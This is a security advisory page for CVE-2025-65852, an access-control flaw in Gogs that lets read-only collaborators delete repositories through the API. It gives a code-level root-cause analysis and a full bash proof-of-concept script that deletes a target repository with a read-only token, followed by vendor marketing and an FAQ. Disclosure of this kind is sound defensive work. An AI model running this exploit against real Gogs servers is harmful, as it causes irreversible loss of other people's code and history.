CVE-2025-65852 — gogs.io/gogs
Improper Access ControlSummary
The DELETE /api/v1/repos/:owner/:repo endpoint lacks necessary permission validation middleware. Consequently, any user with read access (including read-only collaborators) can delete the entire repository.
This vulnerability stems from the API route configuration only utilizing the repoAssignment() middleware (which only verifies read access) without enforcing reqRepoOwner() or reqRepoAdmin().
Details
- vulnerability location:
- Vulnerable Endpoint:DELETE /api/v1/repos/:owner/:repo
- Routing configuration file: internal/route/api/v1/api.go (approximately line 253)
- Function handling file: internal/route/api/v1/repo/repo.go (approximately lines 320-338)
- Root Cause Analysis
Code Location 1: API Route Configuration (internal/route/api/v1/api.go ~ line 253)
// 当前的路由配置(存在漏洞)
m.Delete("", repo.Delete) // 仅继承了外层的 repoAssignment() 中间件
Code Location 2: Delete Function Implementation (internal/route/api/v1/repo/repo.go ~ lines 320-338)
// Delete 函数内部没有额外的权限检查
func Delete(c *context.APIContext) {
// 直接执行删除操作,未验证用户是否为所有者
if err := models.DeleteRepository(c.User.ID, c.Repo.Repository.ID); err != nil {
c.Error(500, "DeleteRepository", err)
return
}
c.Status(204)
}
- Missing Permission Check Comparison with route configurations for other sensitive operations:
// Webhooks 管理(正确实现)
m.Group("/hooks", func() {
m.Combo("").
Get(repo.ListHooks).
Post(bind(api.CreateHookOption{}), repo.CreateHook)
}, reqRepoAdmin()) // ✅ 使用了权限中间件
// 部署密钥管理(正确实现)
m.Group("/keys", func() {
m.Combo("").
Get(repo.ListDeployKeys).
Post(bind(api.CreateKeyOption{}), repo.CreateDeployKey)
}, reqRepoAdmin()) // ✅ 使用了权限中间件
// 删除仓库(漏洞)
m.Delete("", repo.Delete) // ❌ 没有使用权限中间件
- Data Flow Path
- API Request Path: DELETE /api/v1/repos/:owner/:repo
- Route Handling: The outer middleware repoAssignment() verifies that the user has read access (Passed).
- Execution: The system directly executes the repo.Delete() function.
- Permission Check: The reqRepoOwner() middleware check is missing.
- Internal Validation: There is no permission validation inside the Delete() function either.
- Result: Any user with read permission can delete the repository.
PoC
Prerequisites
- A running Gogs instance.
- The attacker's account is added as a collaborator to the target repository (Read access is sufficient).
- The attacker possesses a valid API access token.
- The target repository exists and is accessible.
📜 Test Steps (Bash)
-
Verify Gogs service is running curl -I http://localhost:10880
-
Create test accounts and repository
- Owner account: owner / owner123456
- Read-only account: victim / victim123456
- Test repository: owner/delete-test <img width="1580" height="832" alt="image" src="https://github.com/user-attachments/assets/d1babac8-d952-4765-ba34-d4891c12b8db" />
-
Add 'victim' as a read-only collaborator Perform this via the Web UI or API <img width="1597" height="725" alt="image" src="https://github.com/user-attachments/assets/f76db1d4-9e45-4a97-af22-50db124ec4d0" /> <img width="1597" height="760" alt="image" src="https://github.com/user-attachments/assets/f6ef3bd9-47d4-4202-bf10-2022be557f16" />
-
Obtain API token for 'victim' curl -X POST http://localhost:10880/api/v1/users/victim/tokens
-u victim:victim123456
-H "Content-Type: application/json"
-d '{"name":"test-token"}' -
Resource deleted <img width="1602" height="483" alt="image" src="https://github.com/user-attachments/assets/3e77aaaa-ffbc-4521-be4b-9a62f36499ff" /> Web UI:Target repository deletion successful <img width="1581" height="853" alt="image" src="https://github.com/user-attachments/assets/fbd6b4a4-c874-44f9-9b6e-765371eddcc7" />
📜 PoC Script
#!/bin/bash
# Gogs 仓库删除授权绕过漏洞 PoC
# ============ 配置信息 ============
GOGS_URL="http://localhost:10880"
TARGET_REPO="owner/delete-test"
VICTIM_TOKEN="your_victim_read_only_token_here"
# ============ 执行攻击 ============
echo "========================================"
echo "Gogs 仓库删除授权绕过漏洞 PoC"
echo "========================================"
echo ""
echo "目标仓库: $TARGET_REPO"
echo "攻击者权限: Read(只读)"
echo "预期行为: 403 Forbidden(应该被拒绝)"
echo ""
# 步骤1:验证仓库存在
echo "[步骤1] 验证目标仓库存在..."
REPO_CHECK=$(curl -s -o /dev/null -w "%{http_code}" \
-H "Authorization: token $VICTIM_TOKEN" \
"$GOGS_URL/api/v1/repos/$TARGET_REPO")
if [ "$REPO_CHECK" == "200" ]; then
echo "✓ 仓库存在且可访问"
else
echo "✗ 仓库不存在或无权访问 (状态码: $REPO_CHECK)"
exit 1
fi
# 步骤2:尝试删除仓库(漏洞利用)
echo ""
echo "[步骤2] 使用只读权限尝试删除仓库..."
DELETE_RESPONSE=$(curl -s -w "\nHTTP_CODE:%{http_code}" \
-X DELETE \
-H "Authorization: token $VICTIM_TOKEN" \
"$GOGS_URL/api/v1/repos/$TARGET_REPO")
DELETE_CODE=$(echo "$DELETE_RESPONSE" | grep "HTTP_CODE:" | cut -d: -f2)
echo "实际状态码: $DELETE_CODE"
echo ""
# 步骤3:验证结果
if [ "$DELETE_CODE" == "204" ] || [ "$DELETE_CODE" == "200" ]; then
echo "========================================"
echo "🔴 漏洞确认:删除成功!"
echo "========================================"
echo ""
echo "只读权限用户成功删除了仓库!"
echo ""
# 验证仓库是否真的被删除
sleep 2
echo "验证仓库是否真的被删除..."
VERIFY_CHECK=$(curl -s -o /dev/null -w "%{http_code}" \
-H "Authorization: token $VICTIM_TOKEN" \
"$GOGS_URL/api/v1/repos/$TARGET_REPO")
if [ "$VERIFY_CHECK" == "404" ]; then
echo "✗ 仓库已被完全删除(404 Not Found)"
echo ""
echo "危害确认:"
echo " - 仓库及所有数据永久丢失"
echo " - 代码历史记录不可恢复"
echo " - 这是一个 HIGH 级别的严重漏洞"
else
echo "? 仓库状态未知 (状态码: $VERIFY_CHECK)"
fi
elif [ "$DELETE_CODE" == "403" ]; then
echo "========================================"
echo "✅ 无漏洞:操作被正确拒绝"
echo "========================================"
echo ""
echo "只读权限用户无法删除仓库,权限检查正常"
else
echo "========================================"
echo "⚠️ 未预期的响应"
echo "========================================"
echo ""
echo "状态码: $DELETE_CODE"
echo "这可能表示 API 端点不存在或其他错误"
fi
echo ""
echo "========================================"
echo "PoC 执行完成"
echo "========================================"
Impact
Vulnerability Type: Broken Access Control (CWE-284)
Description: A critical authorization bypass vulnerability exists in the Gogs API. The access control mechanism fails to properly validate permissions for destructive operations.
Consequences: An authenticated attacker with low-level privileges (e.g., a collaborator with Read-Only access) can exploit this vulnerability to issue unauthorized DELETE requests. This allows the attacker to permanently delete entire repositories, resulting in the immediate loss of all source code, git history, issues, and wiki documentation.
Severity: This vulnerability poses a critical risk to data integrity and availability, potentially leading to irreversible data loss and significant operational disruption for affected organizations.
The Core Risk: Privilege Escalation & Data Destruction The most critical aspect of this vulnerability is the violation of the Principle of Least Privilege. It allows a user with the lowest level of access (Read-Only) to execute the most destructive action possible (Delete).
Deep Security Visibility Without the Complexity
SynScan provides clear, real-time security insights so you can monitor your attack surface, spot risks early, and act fast—without extra complexity.
- No setup fees
- 5-min deployment
- Cancel anytime
Frequently Asked Questions
A security vulnerability is a weakness in software, hardware, or configuration that can be exploited to compromise confidentiality, integrity, or availability. Many vulnerabilities are tracked as CVEs (Common Vulnerabilities and Exposures), which provide a standardized identifier so teams can coordinate patching, mitigation, and risk assessment across tools and vendors.
CVSS (Common Vulnerability Scoring System) estimates technical severity, but it doesn't automatically equal business risk. Prioritize using context like internet exposure, affected asset criticality, known exploitation (proof-of-concept or in-the-wild), and whether compensating controls exist. A "Medium" CVSS on an exposed, production system can be more urgent than a "Critical" on an isolated, non-production host.
A vulnerability is the underlying weakness. An exploit is the method or code used to take advantage of it. A zero-day is a vulnerability that is unknown to the vendor or has no publicly available fix when attackers begin using it. In practice, risk increases sharply when exploitation becomes reliable or widespread.
Recurring findings usually come from incomplete Asset Discovery, inconsistent patch management, inherited images, and configuration drift. In modern environments, you also need to watch the software supply chain: dependencies, containers, build pipelines, and third-party services can reintroduce the same weakness even after you patch a single host. Unknown or unmanaged assets (often called Shadow IT) are a common reason the same issues resurface.
Use a simple, repeatable triage model: focus first on externally exposed assets, high-value systems (identity, VPN, email, production), vulnerabilities with known exploits, and issues that enable remote code execution or privilege escalation. Then enforce patch SLAs and track progress using consistent metrics so remediation is steady, not reactive.
SynScan combines attack surface monitoring and continuous security auditing to keep your inventory current, flag high-impact vulnerabilities early, and help you turn raw findings into a practical remediation plan.